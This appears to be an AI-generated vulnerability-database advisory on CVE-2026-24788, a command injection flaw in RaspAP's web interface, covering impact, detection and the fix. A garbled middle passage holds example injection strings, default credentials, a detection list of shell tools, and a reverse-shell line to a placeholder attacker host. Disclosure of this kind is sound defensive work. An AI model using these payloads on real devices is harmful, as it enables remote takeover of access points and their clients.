
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24788 is an OS Command Injection vulnerability in RaspAP's raspap-webgui web management interface affecting all versions prior to 3.3.6. It allows any authenticated user to execute arbitrary OS commands on the underlying system over the network. The vulnerability was published on February 2, 2026, with the fix released in version 3.3.6. It carries a CVSS v3 base score of 8.8 (High) and a CVSS v4 base score of 8.7 (High) (GitHub Advisory, Feedly).
The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), meaning the application constructs OS commands using user-supplied input without adequately sanitizing or escaping shell metacharacters (GitHub Advisory). The attack vector is network-based, requires low privileges (a valid login to the RaspAP web interface), no user interaction, and low attack complexity. The fix was introduced in commit f514f5a of the raspap-webgui repository (GitHub Advisory). The vulnerability was assigned by JPCERT/CC and is also tracked as JVN#27202136 (JVN).
Successful exploitation grants an authenticated attacker the ability to execute arbitrary OS commands on the host system running RaspAP, resulting in high impact to confidentiality, integrity, and availability. An attacker could read sensitive configuration files and credentials, modify system data, disrupt network services managed by RaspAP, or use the compromised device as a pivot point for lateral movement within the network (GitHub Advisory, Feedly). RaspAP is commonly deployed on Raspberry Pi devices acting as wireless access points, so compromise could affect all clients connected through the device.
As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of active in-the-wild exploitation (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.105% (28th percentile), indicating a relatively low near-term exploitation probability (GitHub Advisory). Exploitation requires valid credentials to the RaspAP web interface, which limits the attack surface compared to unauthenticated vulnerabilities.
admin/secret on many installations if not changed).;, |, $(...), or backticks) appended with an arbitrary command (e.g., ; id, | whoami, or a reverse shell payload such as ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1).;, |, $(), backticks) in parameter values; authentication logs showing successful logins followed immediately by anomalous activity.bash, sh, curl, wget, python, nc); processes running under the web server user account performing network connections.The primary remediation is to upgrade raspap-webgui to version 3.3.6 or later, which contains the fix for this vulnerability (GitHub Advisory, RaspAP Releases). As interim workarounds, administrators should restrict network access to the RaspAP web interface to trusted networks only (e.g., via firewall rules), change default credentials immediately, and enforce strong authentication for all RaspAP user accounts. Monitoring for suspicious command execution patterns on affected systems is also recommended until patching is complete (Feedly).
The vulnerability received coverage from The Hacker Wire and was noted on Mastodon/Infosec.Exchange and Bluesky shortly after disclosure (The Hacker Wire). VulDB also tracked and published information on the vulnerability. Community reaction was moderate, consistent with the authenticated-only exploitation requirement limiting broader alarm. No major vendor statements beyond the GitHub advisory and JVN disclosure were identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."